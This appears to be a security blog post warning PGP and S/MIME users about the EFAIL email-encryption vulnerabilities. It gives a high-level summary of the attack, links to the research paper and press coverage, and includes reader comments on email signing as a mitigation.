Attention PGP Users: Critical PGP and S/MIME bugs

​EFAIL describes vulnerabilities in the end-to-end encryption technologies OpenPGP and S/MIME that leak the plaintext of encrypted emails. (UPDATE – This attack targets buggy email clients.)​​​

The EFAIL attacks exploit vulnerabilities in the OpenPGP and S/MIME standards to reveal the plaintext of encrypted emails. In a nutshell, EFAIL abuses active content of HTML emails, for example externally loaded images or styles, to exfiltrate plaintext through requested URLs. To create these exfiltration channels, the attacker first needs access to the encrypted emails, for example, by eavesdropping on network traffic, compromising email accounts, email servers, backup systems or client computers. The emails could even have been collected years ago.

​Technical ​summary

​Susceptibility of OpenPGP, GnuPG, and Gpg4WinPG

Full technical paper

Efail: Breaking S/MIME and OpenPGP Email Encryption using Exfiltration Channels [v0.9 Draft][PDF]
Damian Poddebniak, Christian Dresen, Jens Müller, Fabian Ising, Sebastian Schinzel, Simon
Friedberger, Juraj Somorovsky, and Jörg Schwenk.
27th USENIX Security Symposium, Baltimore, August 2018.

The team can be contacted at


Electronic Frontier Foundation
MAY 13, 2018
Attention PGP Users: New Vulnerabilities Require You To Take Action Now

Ars Technica
MAY 14, 2018
Critical PGP and S/MIME bugs can reveal encrypted e-mails. Uninstall now

  • Andrew Vineyard says:

    Reading the article, the flaw isn’t in the encryption method itself, but in the email client. Even the article states that it can be fixed by patches to clients like Thunderbird, as it abuses a feature built into the email program’s rendering of live content.

    However another way to prevent this exploit is not only encrypting the text, but also signing the entire email. If the signature from the email doesn’t match the sender’s email address, then it’s may very well be a maliciously crafted email from a third party that is sending spoofed messages. If you have the user’s PGP or S/MIME public keys, then you know something is off and you can contact them for an update, and if the email account was spoofed, then the real user will still get the request from you and not sent to the malicious user.

    I always recommend using the signature feature for these programs to prove who I am, because I regularly get emails that appear to be from people I know, however it quickly becomes obvious it’s not. Even got one appearing to be from someone I was speaking to on the phone once, and they never sent the email. Signing your emails using S/MIME or PGP can also mitigate an attack from a spoofed email, potentially even EFAIL, because changing the email to decrypt the ciphertext breaks the signature.

    • Nathan House says:

      These are good points. I have included the link to official response for balance.

  • >